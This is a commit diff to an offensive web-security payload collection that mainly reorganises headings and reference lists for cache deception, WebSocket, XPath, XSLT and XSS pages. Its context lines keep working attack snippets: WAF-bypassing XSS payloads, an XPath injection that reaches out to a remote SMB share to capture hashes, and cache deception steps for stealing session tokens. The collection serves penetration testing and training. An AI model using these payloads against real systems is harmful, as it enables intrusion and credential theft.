References updated for XPATH, XSLT, XXE, Web Socket

Web Cache Deception/README.md

@@ -7,17 +7,16 @@
 
 * [Tools](#tools)
 * [Exploit](#exploit)
-    * [Methodology - Caching Sensitive Data](#methodology---caching-sensitive-data)
-    * [Methodology - Caching Custom JavaScript](#methodology---caching-custom-javascript)
+    * [Caching Sensitive Data](#caching-sensitive-data)
+    * [Caching Custom JavaScript](#caching-custom-javascript)
 * [CloudFlare Caching](#cloudflare-caching)
 * [Labs](#labs)
 * [References](#references)
 
 
 ## Tools
 
-* [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner)
-    > This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.
+* [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) - Web Cache Poisoning Burp Extension
 
 
 ## Exploit
@@ -37,9 +36,10 @@ Imagine an attacker lures a logged-in victim into accessing `http://www.example.
 ![WCD Demonstration](Images/wcd.jpg)
 
 
-### Methodology - Caching Sensitive Data
+### Caching Sensitive Data
 
 **Example 1** - Web Cache Deception on PayPal Home Page
+
 1. Normal browsing, visit home : `https://www.example.com/myaccount/home/`
 2. Open the malicious link : `https://www.example.com/myaccount/home/malicious.css`
 3. The page is displayed as /home and the cache is saving the page
@@ -50,14 +50,15 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
 [![DEMO](https://i.vimeocdn.com/video/674856618-f9bac811a4c7bcf635c4eff51f68a50e3d5532ca5cade3db784c6d178b94d09a-d)](https://vimeo.com/249130093)
 
 **Example 2** - Web Cache Deception on OpenAI
+
 1. Attacker crafts a dedicated .css path of the `/api/auth/session` endpoint.
 2. Attacker distributes the link
 3. Victims visit the legitimate link.
 4. Response is cached.
 5. Attacker harvests JWT Credentials.
 
 
-### Methodology - Caching Custom JavaScript
+### Caching Custom JavaScript
 
 1. Find an un-keyed input for a Cache Poisoning
     ```js
@@ -92,7 +93,6 @@ The following URL format are a good starting point to check for "cache" feature.
 * https://example.com/home.php/non-existent.css
 
 
-
 ## CloudFlare Caching
 
 CloudFlare caches the resource when the `Cache-Control` header is set to `public` and `max-age` is greater than 0. 
@@ -132,14 +132,14 @@ Exceptions and bypasses:
 
 ## References
 
-* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
-* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
-* [Web Cache Entanglement: Novel Pathways to Poisoning - James Kettle @albinowax](https://portswigger.net/research/web-cache-entanglement)
-* [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29)
-* [Web cache poisoning - Web Security Academy learning materials](https://portswigger.net/web-security/web-cache-poisoning)
-  - [Exploiting cache design flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws)
-  - [Exploiting cache implementation flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws)
-* [OpenAI Account Takeover - @naglinagli - Mar 24, 2023](https://twitter.com/naglinagli/status/1639343866313601024)
-* [Shockwave Identifies Web Cache Deception and Account Takeover Vulnerability affecting OpenAI's ChatGPT - Gal Nagli](https://www.shockwave.cloud/blog/shockwave-works-with-openai-to-fix-critical-chatgpt-vulnerability)
-* [Cache Deception Armor - Cloudflare](https://developers.cloudflare.com/cache/cache-security/cache-deception-armor/)
-* [How I Test For Web Cache Vulnerabilities + Tips And Tricks - bombon - Jul 21, 2022](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
+- [Cache Deception Armor - Cloudflare - May 20, 2023](https://developers.cloudflare.com/cache/cache-security/cache-deception-armor/)
+- [Exploiting cache design flaws - PortSwigger - May 4, 2020](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws)
+- [Exploiting cache implementation flaws - PortSwigger - May 4, 2020](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws)
+- [How I Test For Web Cache Vulnerabilities + Tips And Tricks - bombon (0xbxmbn) - July 21, 2022](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
+- [OpenAI Account Takeover - Nagli (@naglinagli) - March 24, 2023](https://twitter.com/naglinagli/status/1639343866313601024)
+- [Practical Web Cache Poisoning - James Kettle (@albinowax) - August 9, 2018](https://portswigger.net/blog/practical-web-cache-poisoning)
+- [Shockwave Identifies Web Cache Deception and Account Takeover Vulnerability affecting OpenAI's ChatGPT - Nagli (@naglinagli) - July 15, 2024](https://www.shockwave.cloud/blog/shockwave-works-with-openai-to-fix-critical-chatgpt-vulnerability)
+- [Web Cache Deception Attack - Omer Gil - February 27, 2017](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
+- [Web Cache Deception Attack leads to user info disclosure - Kunal Pandey (@kunal94) - February 25, 2019](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29)
+- [Web Cache Entanglement: Novel Pathways to Poisoning - James Kettle (@albinowax) - August 5, 2020](https://portswigger.net/research/web-cache-entanglement)
+- [Web cache poisoning - PortSwigger - May 4, 2020](https://portswigger.net/web-security/web-cache-poisoning)

Web Sockets/README.md

@@ -6,8 +6,8 @@
 
 * [Tools](#tools)
 * [Exploit](#exploit)
-  * [Using wsrepl](#using-wsrepl)
-  * [Using ws-harness.py](#using-ws-harness-py)
+    * [Using wsrepl](#using-wsrepl)
+    * [Using ws-harness.py](#using-ws-harness-py)
 * [Cross-Site WebSocket Hijacking (CSWSH)](#cross-site-websocket-hijacking-cswsh)
 * [Labs](#labs)
 * [References](#references)
@@ -128,13 +128,15 @@ in order to add this header.
 
 ## Labs
 
-* [PortSwigger Labs for Web Sockets](https://portswigger.net/web-security/all-labs#http-request-smuggling)
+* [PortSwigger - Manipulating WebSocket messages to exploit vulnerabilities](https://portswigger.net/web-security/websockets/lab-manipulating-messages-to-exploit-vulnerabilities)
+* [PortSwigger - Cross-site WebSocket hijacking](https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking/lab)
+* [PortSwigger - Manipulating the WebSocket handshake to exploit vulnerabilities](https://portswigger.net/web-security/websockets/lab-manipulating-handshake-to-exploit-vulnerabilities)
 
 
 ## References
 
-- [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://web.archive.org/web/20190306170840/https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
-- [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
-- [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#)
-- [Hacktricks - CSWSH](https://book.hacktricks.xyz/pentesting-web/cross-site-websocket-hijacking-cswsh)
-- [Streamlining Websocket Pentesting with wsrepl - Andrez Konstantinov - 18 Jul 2023](https://blog.doyensec.com/2023/07/18/streamlining-websocket-pentesting-with-wsrepl.html)
+- [Hacking Web Sockets: All Web Pentest Tools Welcomed - Michael Fowl - March 5, 2019](https://web.archive.org/web/20190306170840/https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
+- [Hacking with WebSockets - Mike Shema, Sergey Shekyan, Vaagn Toukharian - September 20, 2012](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
+- [Mini WebSocket CTF - Snowscan - January 27, 2020](https://snowscan.io/bbsctf-evilconneck/#)
+- [Streamlining Websocket Pentesting with wsrepl - Andrez Konstantinov - July 18, 2023](https://blog.doyensec.com/2023/07/18/streamlining-websocket-pentesting-with-wsrepl.html)
+- [WebSocket Attacks - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/websocket-attacks)

XPATH Injection/README.md

@@ -4,12 +4,21 @@
 
 ## Summary
 
+* [Tools](#tools)
 * [Exploitation](#exploitation)
 * [Blind exploitation](#blind-exploitation)
 * [Out Of Band Exploitation](#out-of-band-exploitation)
-* [Tools](#tools)
 * [References](#references)
 
+## Tools
+
+- [orf/xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
+- [feakk/xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool 
+- [aayla-secura/xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text 
+- [micsoftvn/xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
+- [Harshal35/XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
+
+
 ## Exploitation
 
 Similar to SQL : `"string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())"`
@@ -51,15 +60,7 @@ search=Har') and starts-with(../password,'c
 http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
 ```
 
-## Tools
-
-- [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
-- [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool 
-- [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text 
-- [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
-- [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
-
 ## References
 
-* [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
-* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
+- [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
+- [XPATH Injection - OWASP - January 21, 2015](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))

XSLT Injection/README.md

@@ -4,18 +4,17 @@
 
 ## Summary
 
-- [XSLT Injection](#xslt-injection)
-  - [Summary](#summary)
-  - [Tools](#tools)
-  - [Exploit](#exploit)
+- [Summary](#summary)
+- [Tools](#tools)
+- [Exploit](#exploit)
     - [Determine the vendor and version](#determine-the-vendor-and-version)
     - [External Entity](#external-entity)
     - [Read files and SSRF using document](#read-files-and-ssrf-using-document)
     - [Write files with EXSLT extension](#write-files-with-exslt-extension)
     - [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper)
     - [Remote Code Execution with Java](#remote-code-execution-with-java)
     - [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
-  - [References](#references)
+- [References](#references)
 
 ## Tools
 
@@ -241,8 +240,8 @@ return proc.StandardOutput.ReadToEnd();
 
 ## References
 
-* [From XSLT code execution to Meterpreter shells - @agarri - 02 July 2012](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
-* [XSLT Injection - Fortify](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
-* [XSLT Injection Basics - Saxon](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
-* [Getting XXE in Web Browsers using ChatGPT - Igor Sak-Sakovskiy - May 22, 2024](https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/)
-* [XSLT injection lead to file creation - PT SWARM - 30 may 2024](https://twitter.com/ptswarm/status/1796162911108255974/photo/1)
+- [From XSLT code execution to Meterpreter shells - Nicolas Grégoire (@agarri) - July 2, 2012](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
+- [XSLT Injection - Fortify - January 16, 2021](http://web.archive.org/web/20210116001237/https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
+- [XSLT Injection Basics - Saxon - Hunnic Cyber Team - August 21, 2019](http://web.archive.org/web/20190821174700/https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
+- [Getting XXE in Web Browsers using ChatGPT - Igor Sak-Sakovskiy - May 22, 2024](https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/)
+- [XSLT injection lead to file creation - PT SWARM (@ptswarm) - May 30, 2024](https://twitter.com/ptswarm/status/1796162911108255974/photo/1)

XSS Injection/README.md

@@ -4,42 +4,41 @@
 
 ## Summary
 
-- [Cross Site Scripting](#cross-site-scripting)
-  - [Vulnerability Details](#vulnerability-details)
-  - [Exploit code or POC](#exploit-code-or-poc)
+- [Vulnerability Details](#vulnerability-details)
+- [Exploit code or POC](#exploit-code-or-poc)
     - [Data grabber for XSS](#data-grabber-for-xss)
     - [CORS](#cors)
     - [UI redressing](#ui-redressing)
     - [Javascript keylogger](#javascript-keylogger)
     - [Other ways](#other-ways)
-  - [Identify an XSS endpoint](#identify-an-xss-endpoint)
+- [Identify an XSS endpoint](#identify-an-xss-endpoint)
     - [Tools](#tools)
-  - [XSS in HTML/Applications](#xss-in-htmlapplications)
+- [XSS in HTML/Applications](#xss-in-htmlapplications)
     - [Common Payloads](#common-payloads)
     - [XSS using HTML5 tags](#xss-using-html5-tags)
     - [XSS using a remote JS](#xss-using-a-remote-js)
     - [XSS in hidden input](#xss-in-hidden-input)
     - [XSS when payload is reflected capitalized](#xss-when-payload-is-reflected-capitalized)
     - [DOM based XSS](#dom-based-xss)
     - [XSS in JS Context](#xss-in-js-context)
-  - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
-  - [XSS in files](#xss-in-files)
+- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
+- [XSS in files](#xss-in-files)
     - [XSS in XML](#xss-in-xml)
     - [XSS in SVG](#xss-in-svg)
     - [XSS in SVG (short)](#xss-in-svg-short)
     - [XSS in Markdown](#xss-in-markdown)
     - [XSS in SWF flash application](#xss-in-swf-flash-application)
     - [XSS in SWF flash application](#xss-in-swf-flash-application-1)
     - [XSS in CSS](#xss-in-css)
-  - [XSS in PostMessage](#xss-in-postmessage)
-  - [Blind XSS](#blind-xss)
+- [XSS in PostMessage](#xss-in-postmessage)
+- [Blind XSS](#blind-xss)
     - [XSS Hunter](#xss-hunter)
     - [Other Blind XSS tools](#other-blind-xss-tools)
     - [Blind XSS endpoint](#blind-xss-endpoint)
     - [Tips](#tips)
-  - [Mutated XSS](#mutated-xss)
-  - [Polyglot XSS](#polyglot-xss)
-  - [Filter Bypass and exotic payloads](#filter-bypass-and-exotic-payloads)
+- [Mutated XSS](#mutated-xss)
+- [Polyglot XSS](#polyglot-xss)
+- [Filter Bypass and exotic payloads](#filter-bypass-and-exotic-payloads)
     - [Bypass case sensitive](#bypass-case-sensitive)
     - [Bypass tag blacklist](#bypass-tag-blacklist)
     - [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation)
@@ -76,7 +75,7 @@
     - [Bypass using BOM](#bypass-using-bom)
     - [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation)
     - [Bypass using jsfuck](#bypass-using-jsfuck)
-  - [CSP Bypass](#csp-bypass)
+- [CSP Bypass](#csp-bypass)
     - [Bypass CSP using JSONP](#bypass-csp-using-jsonp)
     - [Bypass CSP default-src](#bypass-csp-default-src)
     - [Bypass CSP inline eval](#bypass-csp-inline-eval)
@@ -85,7 +84,8 @@
     - [Bypass CSP script-src data](#bypass-csp-script-src-data)
     - [Bypass CSP nonce](#bypass-csp-nonce)
     - [Bypass CSP header sent by PHP](#bypass-csp-header-sent-by-php)
-  - [References](#references)
+- [References](#references)
+
 
 ## Vulnerability Details
 
@@ -1370,11 +1370,6 @@ Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)
 ## References
 
 - [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
-- tbm
-- [(Relative Path Overwrite) RPO XSS - Infinite Security](http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html)
-- [RPO TheSpanner](http://www.thespanner.co.uk/2014/03/21/rpo/)
-- [RPO Gadget - innerthmtl](https://web.archive.org/web/20220521125028/https://blog.innerht.ml/rpo-gadgets/)
-- [Relative Path Overwrite - Detectify](https://support.detectify.com/support/solutions/articles/48001048955-relative-path-overwrite)
 - [XSS ghettoBypass - d3adend](http://d3adend.org/xss/ghettoBypass)
 - [XSS without HTML: Client-Side Template Injection with AngularJS](http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html)
 - [XSSING WEB PART - 2 - Rakesh Mane](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
@@ -1432,4 +1427,4 @@ Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)
 - [Bypass < with ＜](https://hackerone.com/reports/639684)
 - [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code)
 - [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - 13 may 2024](https://youtu.be/Sm4G6cAHjWM)
-- [Encoding Differentials: Why Charset Matters - Stefan Schiller - July 15, 2024](https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/)
+- [Encoding Differentials: Why Charset Matters - Stefan Schiller - July 15, 2024](https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/)

XSS Injection/XSS Common WAF Bypass.md

@@ -1,5 +1,14 @@
 # Common WAF Bypass
 
+## Summary
+
+* [Cloudflare](#cloudflare)
+* [Chrome Auditor](#chrome-auditor)
+* [Incapsula WAF](#incapsula-waf)
+* [Akamai WAF](#akamai-waf)
+* [WordFence WAF](#wordfence-waf)
+* [Fortiweb WAF](#fortiweb-waf)
+
 ## Cloudflare
 
 * 25st January 2021 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
@@ -35,7 +44,6 @@
     <svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
     ```
 
-
 * 27th February 2018
     ```html
     <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
@@ -83,7 +91,7 @@ NOTE: Chrome Auditor is deprecated and removed on latest version of Chrome and C
     ```
 
 
-## WordFence WAF 
+## WordFence WAF
 
 * 12th September 2018 - [@brutelogic](https://twitter.com/brutelogic)
     ```html
@@ -95,9 +103,4 @@ NOTE: Chrome Auditor is deprecated and removed on latest version of Chrome and C
 * 9th July 2019 - [@rezaduty](https://twitter.com/rezaduty)
     ```javascript
     \u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
-    ```
-
-
-## References
-
-* [TODO](TODO)
+    ```